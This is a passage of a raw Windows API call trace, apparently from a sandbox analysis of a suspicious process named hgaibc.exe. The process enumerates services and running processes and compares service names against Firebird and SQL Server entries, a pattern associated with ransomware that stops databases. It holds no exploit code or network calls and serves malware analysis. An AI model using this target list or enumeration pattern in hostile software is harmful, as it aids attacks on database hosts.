lpString2="Power") returned -1 [0200.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0200.208] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0200.208] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0200.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0200.208] lstrlenW (lpString="ProfSvc") returned 7 [0200.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0200.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0200.208] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0200.208] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0200.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0200.208] lstrlenW (lpString="RpcEptMapper") returned 12 [0200.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0200.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0200.208] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0200.208] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0200.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0200.208] lstrlenW (lpString="RpcSs") returned 5 [0200.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0200.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0200.208] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0200.208] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0200.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0200.208] lstrlenW (lpString="SamSs") returned 5 [0200.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0200.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0200.209] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0200.209] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0200.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0200.209] lstrlenW (lpString="Schedule") returned 8 [0200.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0200.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0200.209] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0200.209] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0200.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0200.209] lstrlenW (lpString="SecurityHealthService") returned 21 [0200.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0200.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0200.209] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0200.209] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0200.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0200.209] lstrlenW (lpString="SENS") returned 4 [0200.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0200.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0200.209] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0200.209] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0200.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0200.209] lstrlenW (lpString="ShellHWDetection") returned 16 [0200.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0200.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0200.209] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0200.209] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0200.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0200.209] lstrlenW (lpString="Spooler") returned 7 [0200.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0200.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0200.209] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0200.209] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0200.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0200.209] lstrlenW (lpString="StateRepository") returned 15 [0200.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0200.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0200.210] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0200.210] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0200.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0200.210] lstrlenW (lpString="SysMain") returned 7 [0200.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0200.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0200.210] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0200.210] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0200.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0200.210] lstrlenW (lpString="SystemEventsBroker") returned 18 [0200.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0200.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0200.210] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0200.210] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0200.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0200.210] lstrlenW (lpString="Themes") returned 6 [0200.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0200.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0200.210] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0200.210] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0200.210] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x33c [0200.484] Process32FirstW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.485] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0200.486] lstrlenW (lpString="System") returned 6 [0200.486] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0200.486] lstrlenW (lpString="smss.exe") returned 8 [0200.486] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.487] lstrlenW (lpString="csrss.exe") returned 9 [0200.487] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0200.488] lstrlenW (lpString="wininit.exe") returned 11 [0200.488] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.489] lstrlenW (lpString="csrss.exe") returned 9 [0200.489] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0200.490] lstrlenW (lpString="winlogon.exe") returned 12 [0200.490] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0200.490] lstrlenW (lpString="services.exe") returned 12 [0200.490] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0200.491] lstrlenW (lpString="lsass.exe") returned 9 [0200.491] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0200.492] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0200.492] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0200.493] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0200.493] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.494] lstrlenW (lpString="svchost.exe") returned 11 [0200.494] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.495] lstrlenW (lpString="svchost.exe") returned 11 [0200.495] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0200.496] lstrlenW (lpString="dwm.exe") returned 7 [0200.496] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.497] lstrlenW (lpString="svchost.exe") returned 11 [0200.497] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.497] lstrlenW (lpString="svchost.exe") returned 11 [0200.498] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.498] lstrlenW (lpString="svchost.exe") returned 11 [0200.498] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.499] lstrlenW (lpString="svchost.exe") returned 11 [0200.499] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.500] lstrlenW (lpString="svchost.exe") returned 11 [0200.500] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.501] lstrlenW (lpString="svchost.exe") returned 11 [0200.501] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.502] lstrlenW (lpString="svchost.exe") returned 11 [0200.502] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.502] lstrlenW (lpString="svchost.exe") returned 11 [0200.503] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.503] lstrlenW (lpString="svchost.exe") returned 11 [0200.503] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.504] lstrlenW (lpString="svchost.exe") returned 11 [0200.504] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0200.505] lstrlenW (lpString="spoolsv.exe") returned 11 [0200.505] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.506] lstrlenW (lpString="svchost.exe") returned 11 [0200.506] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0200.507] lstrlenW (lpString="audiodg.exe") returned 11 [0200.507] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0200.508] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0200.508] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0200.509] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0200.509] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0200.510] lstrlenW (lpString="Memory Compression") returned 18 [0200.510] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0200.511] lstrlenW (lpString="sihost.exe") returned 10 [0200.511] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.511] lstrlenW (lpString="svchost.exe") returned 11 [0200.511] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0200.512] lstrlenW (lpString="msoia.exe") returned 9 [0200.512] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0200.513] lstrlenW (lpString="taskhostw.exe") returned 13 [0200.513] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.514] lstrlenW (lpString="explorer.exe") returned 12 [0200.514] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0200.515] lstrlenW (lpString="SearchUI.exe") returned 12 [0200.515] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0200.515] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0200.515] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0200.516] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0200.516] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.517] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0200.517] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0200.518] lstrlenW (lpString="hgaibc.exe") returned 10 [0200.518] Process32NextW (in: hSnapshot=0x33c, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0200.518] CloseHandle (hObject=0x33c) returned 1 [0200.519] Sleep (dwMilliseconds=0x1f4) [0201.775] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bee58 [0201.775] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0201.783] GetLastError () returned 0xea [0201.783] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1cb6) returned 0x3cf0998 [0201.784] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3cf0998, cbBufSize=0x1cb6, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3cf0998, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0201.822] CloseServiceHandle (hSCObject=0x6bee58) returned 1 [0201.841] lstrlenW (lpString="Appinfo") returned 7 [0201.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0201.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0201.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0201.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0201.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0201.842] lstrlenW (lpString="AppXSvc") returned 7 [0201.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0201.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0201.842] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0201.842] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0201.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0201.842] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0201.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0201.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0201.842] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0201.842] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0201.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0201.842] lstrlenW (lpString="Audiosrv") returned 8 [0201.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0201.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0201.842] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0201.842] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0201.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0201.842] lstrlenW (lpString="BFE") returned 3 [0201.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0201.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0201.842] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0201.842] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0201.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0201.842] lstrlenW (lpString="BITS") returned 4 [0201.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0201.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0201.842] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0201.842] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0201.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0201.843] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0201.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0201.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0201.843] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0201.843] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0201.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0201.843] lstrlenW (lpString="CDPSvc") returned 6 [0201.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0201.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0201.843] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0201.843] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 